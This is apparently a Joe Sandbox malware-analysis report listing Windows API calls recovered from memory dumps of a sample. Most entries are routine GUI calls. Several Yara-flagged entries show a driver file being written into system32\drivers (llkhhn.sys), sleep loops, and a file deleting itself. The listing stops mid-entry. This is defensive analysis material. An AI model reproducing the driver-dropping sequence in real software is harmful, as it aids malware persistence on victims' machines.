                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Global$Size$Wire
                                    • String ID: pTL
                                    • API String ID: 2995285337-168633513
                                    APIs
                                    • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 004A9D59
                                    • GetSystemMetrics.USER32(00000000), ref: 004A9D71
                                    • GetSystemMetrics.USER32(00000001), ref: 004A9D78
                                    • lstrcpy.KERNEL32(-00000028,DISPLAY), ref: 004A9D9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: System$Metrics$InfoParameterslstrcpy
                                    • String ID: DISPLAY
                                    • API String ID: 1409579217-865373369
                                    APIs
                                    • Shell_NotifyIcon.SHELL32(00000001), ref: 0042FC69
                                    • DestroyCursor.USER32(?), ref: 0042FC76
                                    • Shell_NotifyIcon.SHELL32 ref: 0042FCA9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_$CursorDestroy
                                    • String ID: X$d
                                    • API String ID: 3039372612-651813629
                                    APIs
                                    • GetWindowExtEx.GDI32(?,?,?,?,?,?,00423CE3,?,?,?,?,?), ref: 004C2E24
                                    • GetViewportExtEx.GDI32(?,<B,?,?,?,?,00423CE3,?,?,?,?,?), ref: 004C2E31
                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 004C2E56
                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 004C2E71
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ViewportWindow
                                    • String ID: <B
                                    • API String ID: 1589084482-252759519
                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(00614470), ref: 004C6D27
                                    • RtlInitializeCriticalSection.NTDLL(00000000), ref: 004C6D39
                                    • RtlLeaveCriticalSection.NTDLL(00614470), ref: 004C6D42
                                    • RtlEnterCriticalSection.NTDLL(00000000), ref: 004C6D54
                                      • Part of subcall function 004C6C59: GetVersion.KERNEL32(?,004C6CFC,005BDEE8,004C60AC,00000010,00000000,00000100,005BDEE8,?,?,004C5A93,004C5AF6,004C5377,004C1DA3,00000100,004C1D3C), ref: 004C6C6C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CriticalSection$Enter$InitializeLeaveVersion
                                    • String ID: pDa
                                    • API String ID: 1193629340-84961933
                                    APIs
                                    • DeleteFileA.KERNEL32(C:\Windows\system32\drivers\llkhhn.sys), ref: 024245A7
                                    • CreateFileA.KERNEL32(C:\Windows\system32\drivers\llkhhn.sys,40000000,00000002,00000000,00000002,00000020,00000000), ref: 024245C1
                                    • WriteFile.KERNEL32(000000FF,024A25F4,00001425,00000000,00000000), ref: 024245E6
                                    • CloseHandle.KERNEL32(000000FF), ref: 024245F0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateDeleteHandleWrite
                                    • String ID: C:\Windows\system32\drivers\llkhhn.sys
                                    • API String ID: 656945655-4146516600
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Client$Copy
                                    • String ID:
                                    • API String ID: 472922470-0
                                    APIs
                                    • LoadTypeLib.OLEAUT32(00000000), ref: 00411A5F
                                      • Part of subcall function 00434C60: lstrlen.KERNEL32(00000000,00000000,0042B593,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00434C6E
                                    • GetUserDefaultLCID.KERNEL32(00000000,?,?,00000001), ref: 00411A9B
                                    • LHashValOfNameSys.OLEAUT32(00000001,00000000), ref: 00411AA4
                                    • RegisterTypeLib.OLEAUT32(?,00000000), ref: 00411B09
                                    • OleRun.OLE32(00000000), ref: 00411B90
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Type$DefaultHashLoadNameRegisterUserlstrlen
                                    • String ID:
                                    • API String ID: 2906146520-0
                                    APIs
                                    • GetTextExtentPoint32A.GDI32(?,005BDCBC,?,?), ref: 00414661
                                    • GetSystemMetrics.USER32(0000002E), ref: 00414675
                                    • GetWindowRect.USER32(?,?), ref: 00414695
                                    • GetStockObject.GDI32(00000011), ref: 004146E2
                                    • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 004146F1
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ExtentMessageMetricsObjectPoint32RectSendStockSystemTextWindow
                                    • String ID:
                                    • API String ID: 3316701254-0
                                    APIs
                                    • IsWindow.USER32(?), ref: 004309C0
                                    • WinHelpA.USER32(?,00000000,00000002,00000000), ref: 004309DB
                                    • GetMenu.USER32(?), ref: 004309EB
                                    • SetMenu.USER32(?,00000000), ref: 004309F8
                                    • DestroyMenu.USER32(00000000), ref: 00430A03
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Menu$DestroyHelpWindow
                                    • String ID:
                                    • API String ID: 427501538-0
                                    APIs
                                    • midiStreamStop.WINMM(00000000,00000000,005DF0DC,00000000,0043C92A,00000000,005DF380,00432DE6,005DF380,?,0042D90F,005DF380,0042B8C6,00000001,00000000,000000FF), ref: 0043CDF5
                                    • midiOutReset.WINMM(00000000,?,0042D90F,005DF380,0042B8C6,00000001,00000000,000000FF), ref: 0043CE13
                                    • WaitForSingleObject.KERNEL32(00000000,000007D0,?,0042D90F,005DF380,0042B8C6,00000001,00000000,000000FF), ref: 0043CE36
                                    • midiStreamClose.WINMM(00000000,?,0042D90F,005DF380,0042B8C6,00000001,00000000,000000FF), ref: 0043CE73
                                    • midiStreamClose.WINMM(00000000,?,0042D90F,005DF380,0042B8C6,00000001,00000000,000000FF), ref: 0043CEA7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: midi$Stream$Close$ObjectResetSingleStopWait
                                    • String ID:
                                    • API String ID: 3142198506-0
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00002020,005D0B80), ref: 004B3A9D
                                    • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,004B3F48,?,00000010,?,00000009,00000009,?,004ABA71,00000010), ref: 004B3AC1
                                    • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,004B3F48,?,00000010,?,00000009,00000009,?,004ABA71,00000010), ref: 004B3ADB
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004B3F48,?,00000010,?,00000009,00000009,?,004ABA71,00000010,?,?), ref: 004B3B9C
                                    • HeapFree.KERNEL32(00000000,00000000,?,?,004B3F48,?,00000010,?,00000009,00000009,?,004ABA71,00000010,?,?), ref: 004B3BB3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFreeHeap$Allocate
                                    • String ID:
                                    • API String ID: 3000792370-0
                                    APIs
                                    • IsWindow.USER32(?), ref: 0042CA90
                                    • GetMenu.USER32(?), ref: 0042CA9F
                                    • DestroyAcceleratorTable.USER32(?), ref: 0042CAEC
                                    • SetMenu.USER32(?,00000000), ref: 0042CB01
                                    • DestroyMenu.USER32(?,?,?,00428D04,?), ref: 0042CB11
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Menu$Destroy$AcceleratorTableWindow
                                    • String ID:
                                    • API String ID: 1240299919-0
                                    APIs
                                    • IsChild.USER32(?,?), ref: 0043267C
                                      • Part of subcall function 004271F0: IsChild.USER32(?,?), ref: 0042726D
                                      • Part of subcall function 004271F0: GetParent.USER32(?), ref: 00427287
                                    • GetCursorPos.USER32(?), ref: 00432694
                                    • GetClientRect.USER32(?,?), ref: 004326A3
                                    • PtInRect.USER32(?,?,?), ref: 004326C4
                                    • SetCursor.USER32(?,?,00000000,?,?,?,?,004322F0), ref: 00432742
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ChildCursorRect$ClientParent
                                    • String ID:
                                    • API String ID: 1110532797-0
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004BA016
                                    • GetParent.USER32(?), ref: 004BA053
                                    • SendMessageA.USER32(?,00000464,00000104,00000000), ref: 004BA07B
                                    • GetParent.USER32(?), ref: 004BA0A4
                                    • SendMessageA.USER32(?,00000465,00000104,00000000), ref: 004BA0C1
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageParentSend$H_prolog
                                    • String ID:
                                    • API String ID: 1056721960-0
                                    • Opcode ID: 24715134d6709e0a0ebceebac326f02f86f4f48dde43b2f5760a62b87c4dd110
                                    • Instruction ID: d5f1b6376bdbe7e604db809f0e8305ba965f4d0c1d3463dd697f456921bba5cd
                                    • Opcode Fuzzy Hash: 24715134d6709e0a0ebceebac326f02f86f4f48dde43b2f5760a62b87c4dd110
                                    • Instruction Fuzzy Hash: E3315E7090021AABCB14EFA5CCD5EFEB774FF50358F10452EA421A71D1EB389905DA69
                                    APIs
                                      • Part of subcall function 004C2F30: __EH_prolog.LIBCMT ref: 004C2F35
                                    • GetClientRect.USER32 ref: 00415A52
                                    • GetWindowRect.USER32(?,?), ref: 00415A61
                                      • Part of subcall function 004C2CEA: ScreenToClient.USER32(?,?), ref: 004C2CFE
                                      • Part of subcall function 004C2CEA: ScreenToClient.USER32(?,?), ref: 004C2D07
                                    • OffsetRect.USER32(?,?,?), ref: 00415A8C
                                      • Part of subcall function 004C2C27: ExcludeClipRect.GDI32(?,?,?,?,?,753DA5C0,?,?,00415A9C,?), ref: 004C2C4C
                                      • Part of subcall function 004C2C27: ExcludeClipRect.GDI32(?,?,?,?,?,753DA5C0,?,?,00415A9C,?), ref: 004C2C61
                                    • OffsetRect.USER32(?,?,?), ref: 00415AAF
                                    • FillRect.USER32(?,?,?), ref: 00415ACA
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Client$ClipExcludeOffsetScreen$FillH_prologWindow
                                    • String ID:
                                    • API String ID: 1774338468-0
                                    • Opcode ID: c7a131d43fdebea98d693f191da27c6ef5e00e5afa866868bc44589020f42b8d
                                    • Instruction ID: 0ce773b2b23152e8487492e21d2b3baa42f1628c6e69d1b4a5959803cee1b590
                                    • Opcode Fuzzy Hash: c7a131d43fdebea98d693f191da27c6ef5e00e5afa866868bc44589020f42b8d
                                    • Instruction Fuzzy Hash: F5315CB5208702AFD754DF24C841FABB7E8EBC8714F008A1DF49687290EB78E905CB56
                                    APIs
                                    • GetSystemDirectoryA.KERNEL32(00000000,00000080), ref: 024247EE
                                    • lstrlen.KERNEL32(00000000), ref: 024247FB
                                    • lstrcat.KERNEL32(00000000,024A55C4), ref: 0242481A
                                    • lstrcat.KERNEL32(00000000,024A3BE0), ref: 0242482E
                                    • lstrcat.KERNEL32(00000000,024A3FE0), ref: 02424841
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$DirectorySystemlstrlen
                                    • String ID:
                                    • API String ID: 3692445580-0
                                    • Opcode ID: 222391341938c4a426d7b26f48b5c3bcd245642df368a8c1957844663bd57a32
                                    • Instruction ID: 7a85464400d037647c8866120836e2aaee9e93d541211665214e77b8f31f8443
                                    • Opcode Fuzzy Hash: 222391341938c4a426d7b26f48b5c3bcd245642df368a8c1957844663bd57a32
                                    • Instruction Fuzzy Hash: 2F2183B5E80214AFCB28DBA4DC48FEA7B79BB48705F044999F309B7280CB705A55CF64
                                    APIs
                                    • Sleep.KERNEL32(00001000), ref: 0242492A
                                    • Sleep.KERNEL32(00000080), ref: 02424947
                                    • lstrlen.KERNEL32(00000000), ref: 02424961
                                    • Sleep.KERNEL32(0002D000), ref: 0242498B
                                    • RtlExitUserThread.NTDLL(00000000), ref: 024249B8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$ExitThreadUserlstrlen
                                    • String ID:
                                    • API String ID: 3026710222-0
                                    • Opcode ID: b7eb78d512b21b85ad76b24587ef83be12b6717fb054659ed0b8630616097c97
                                    • Instruction ID: cdcd602bee5ab8a062d462a6e83c1974201291be93b15c8c2183ae107b818fad
                                    • Opcode Fuzzy Hash: b7eb78d512b21b85ad76b24587ef83be12b6717fb054659ed0b8630616097c97
                                    • Instruction Fuzzy Hash: 43217C70E80318ABDB14CFE5DC49BAEBB74FB08B65F00061AE516A73C0D7795814CB64
                                    APIs
                                    • SendMessageA.USER32(?,00000146), ref: 00421062
                                    • SendMessageA.USER32(?,00000146), ref: 0042107D
                                    • SendMessageA.USER32(?,00000146), ref: 00421099
                                    • SendMessageA.USER32(?,00000146), ref: 004210AD
                                    • SendMessageA.USER32(?,0000014E), ref: 004210C2
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 3e46a7ca8f9f7e33b0c06e305e983b78aa92da4602572d706369d22486d417ac
                                    • Instruction ID: 8f808d0c928e7c840deea02cec6a67e3c45d23130a9f17835087c5fd16d9c255
                                    • Opcode Fuzzy Hash: 3e46a7ca8f9f7e33b0c06e305e983b78aa92da4602572d706369d22486d417ac
                                    • Instruction Fuzzy Hash: D011C631304A48ABC224DA25EC80E5373B9EB99358F114B1EF142C7690C675B441C762
                                    APIs
                                      • Part of subcall function 004BACA5: SendMessageA.USER32(?,0000110C,00000000,00000040), ref: 004BACC6
                                    • SendMessageA.USER32(?,0000110A,00000004,?), ref: 0041D5D5
                                    • SendMessageA.USER32(?,0000110A,00000004,00000000), ref: 0041D5F5
                                    • SendMessageA.USER32(?,00001101,00000000,00000000), ref: 0041D607
                                    • SendMessageA.USER32(?,0000110A,00000004,00000000), ref: 0041D615
                                    • SendMessageA.USER32(?,00001101,00000000,00000000), ref: 0041D627
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 94c9bcd1766b2f0aff132365435f0728968a439e34cbe20554606ac76dec1863
                                    • Instruction ID: 406d4cae92cb785ab7f0ac13e9b06b9a1e8655f8b941508392e2255961350bdf
                                    • Opcode Fuzzy Hash: 94c9bcd1766b2f0aff132365435f0728968a439e34cbe20554606ac76dec1863
                                    • Instruction Fuzzy Hash: C50148F1B407057AF53496699CC1FA7A3AD9FD9B55F00451AB701D72C0C6E4EC464634
                                    APIs
                                    • SendMessageA.USER32(?,00000154), ref: 00420FE5
                                    • SendMessageA.USER32(?,00000153,?,00000000), ref: 00420FFC
                                      • Part of subcall function 00413B40: SendMessageA.USER32(?,00000030,?,00000001), ref: 00413B9D
                                    • SendMessageA.USER32(?,00000154), ref: 00421025
                                    • SendMessageA.USER32(?,00000153,?,?), ref: 0042103D
                                    • InvalidateRect.USER32(?,?,00000001,?,?), ref: 00421046
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$InvalidateRect
                                    • String ID:
                                    • API String ID: 2778011698-0
                                    • Opcode ID: f1888a7e179efd1b61b01ebc94699335342ea66a25b018f934b894b4c48d7389
                                    • Instruction ID: c5b20fc2b9c0c5c8d08232e6d247ff8843f4cb7405a5beffc5b73ad12c4baa58
                                    • Opcode Fuzzy Hash: f1888a7e179efd1b61b01ebc94699335342ea66a25b018f934b894b4c48d7389
                                    • Instruction Fuzzy Hash: D5016D71240B05AFE224DB69DC81FB7B7ACEF85748F01892DF64287780C679B9098A24
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004BEA5B
                                    • GetClassInfoA.USER32(?,?,?), ref: 004BEA76
                                    • RegisterClassA.USER32(00000004), ref: 004BEA81
                                    • lstrcat.KERNEL32(00000034,?), ref: 004BEAB8
                                    • lstrcat.KERNEL32(00000034,?), ref: 004BEAC6
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Classlstrcat$H_prologInfoRegister
                                    • String ID:
                                    • API String ID: 106226465-0
                                    • Opcode ID: ac8975d4646361c569201774565d71ef6d9346ad022c05bf5ebe79874937a58e
                                    • Instruction ID: cd5ae94c7d7f552c814e5d255b9e0c9f61d07d48c9742fa51add316ae0847c8a
                                    • Opcode Fuzzy Hash: ac8975d4646361c569201774565d71ef6d9346ad022c05bf5ebe79874937a58e
                                    • Instruction Fuzzy Hash: E911E535A00204BEC710AFA69C41FDE7BB8EF59714F00856FF406A7551C7B9E604CA69
                                    APIs
                                    • GetLastError.KERNEL32(00000035,0000001D,004AC452,004B0B52,004B7539,0000001D,?,00000000), ref: 004AF51A
                                    • TlsGetValue.KERNEL32(?,00000000), ref: 004AF528
                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 004AF574
                                      • Part of subcall function 004AC846: RtlAllocateHeap.NTDLL(00000008,004AF53D,00000000), ref: 004AC93C
                                    • TlsSetValue.KERNEL32(00000000,?,00000000), ref: 004AF54C
                                    • GetCurrentThreadId.KERNEL32 ref: 004AF55D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue$AllocateCurrentHeapThread
                                    • String ID:
                                    • API String ID: 2047054392-0
                                    • Opcode ID: 684b4a2a591a1d7550d4fac64497a942c85673ab945ac4acb18c1ce197be67e8
                                    • Instruction ID: 8813d2a9a264a9307ced1936798257cc4364b20147c4ba97d0255a585c2c99c5
                                    • Opcode Fuzzy Hash: 684b4a2a591a1d7550d4fac64497a942c85673ab945ac4acb18c1ce197be67e8
                                    • Instruction Fuzzy Hash: 68F0F631D016127BC7712F71BC09A1A3B60AB527B1B14053BFA45D62D1CF28C905969C
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 024256CD
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 024256E3
                                    • DeleteFileA.KERNEL32(00000000), ref: 024256F7
                                    • Sleep.KERNEL32(00002800), ref: 02425702
                                    • RtlExitUserThread.NTDLL(00000000), ref: 0242570C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesDeleteExitSleepThreadUserlstrcpy
                                    • String ID:
                                    • API String ID: 1172011736-0
                                    • Opcode ID: e0e54c19f49ce2e969f7924864a19e1d167783cf6dc550392b791f20afe6e881
                                    • Instruction ID: 9a052eeaba586b683e9cd145ad8a47506ef67ecae37055e8f03edf0ed00ff5bb
                                    • Opcode Fuzzy Hash: e0e54c19f49ce2e969f7924864a19e1d167783cf6dc550392b791f20afe6e881
                                    • Instruction Fuzzy Hash: C3F02132D4431497E7188BB4DC4CBE7BB79BB54311F8046A6FA1AD11C0DB719958CF51
                                    APIs
                                    • GetCurrentObject.GDI32(?), ref: 004458DB
                                    • LPtoDP.GDI32(?,00000000,00000001), ref: 00445928
                                    • DPtoLP.GDI32(?,00000000,00000001), ref: 0044594B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CurrentObject
                                    • String ID: pTL
                                    • API String ID: 844725943-168633513
                                    • Opcode ID: 81077456b3fe08d3b4d27e96222dbf8bf1cabd13402bbd02baabc1d4d7fd8e89
                                    • Instruction ID: 183e886edd81631d63bfdc0feaed128f55d892a7034993e0387bef62622d86d9
                                    • Opcode Fuzzy Hash: 81077456b3fe08d3b4d27e96222dbf8bf1cabd13402bbd02baabc1d4d7fd8e89
                                    • Instruction Fuzzy Hash: 47A1A971208B409BEB18DF55C890B2FB7E9ABC8708F04491EF58693352DB78ED45CB5A
                                    APIs
                                    • GetStockObject.GDI32 ref: 00419ABE
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 00419ACC
                                      • Part of subcall function 004343B0: GetClassInfoA.USER32(?,?,?), ref: 004343C8
                                    • CreateSolidBrush.GDI32(00000000), ref: 00419B1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
